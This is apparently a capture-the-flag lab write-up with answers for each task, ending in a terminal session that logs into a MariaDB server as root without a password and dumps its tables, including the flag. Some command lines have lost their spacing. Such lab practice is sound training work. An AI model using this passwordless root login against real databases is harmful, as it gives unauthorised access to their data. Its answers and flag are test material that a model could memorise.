During our scan, which port running mysql do we find?
Found in initial scan
Answer: 3306
Task 3
What community-developed MySQL version is the target running?
Found in initial scan
Answer: MariaDB
Task 4
What switch do we need to use in order to specify a login username for the MySQL service?
mysql --help
mysql--help|grepuser-u,--user=nameUserforloginifnotcurrentuser.user (No defaultvalue)
Answer: -u
Task 5
Which username allows us to log into MariaDB without providing a password?
Google'd for this answer
Using unix_socket means that if you are the system root user, you can login as root@locahost without a password. This technique was pioneered by Otto KekΓ€lΓ€inen in Debian MariaDB packages and has been successfully used in Debian since as early as MariaDB 10.0.
Answer: root
Task 6
What symbol can we use to specify within the query that we want to display everything inside a table?
The typical common symbol that's used mean "everything", the asterisk/wildcard.
Answer: *
Task 7
What symbol do we need to end each query with?
Looking at SQL examples, we see queries ending with a semi-colon (;)
use users_database;
Answer: ;
Task 8
Submit root flag
/mysql -h rootWelcome to the MySQL monitor. Commands endwith ; or \g.Your MySQL connection id is132Server version: 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10Copyright (c) 2000, 2022, Oracle and/or its affiliates.Oracle is a registered trademark of Oracle Corporation and/or itsaffiliates. Other names may be trademarks of their respectiveowners.Type 'help;'or'\h'for help. Type '\c'toclear the current input statement.mysql> show databases;+--------------------+| Database |+--------------------+| htb || information_schema || mysql || performance_schema |+--------------------+4rowsinset (0.05 sec)mysql>use htb;Reading table information for completion of tableand column namesYou can turn off this feature toget a quicker startup with-ADatabase changedmysql> show tables;+---------------+| Tables_in_htb |+---------------+| config || users |+---------------+2rowsinset (0.05 sec)mysql>select*from config;+----+-----------------------+----------------------------------+| id | name | value |+----+-----------------------+----------------------------------+| 1 | timeout | 60s || 2 | security | default || 3 | auto_logon | false || 4 | max_size | 2M || 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 || 6 | enable_uploads | false || 7 | authentication_method | radius |+----+-----------------------+----------------------------------+7rowsinset (0.05 sec)mysql>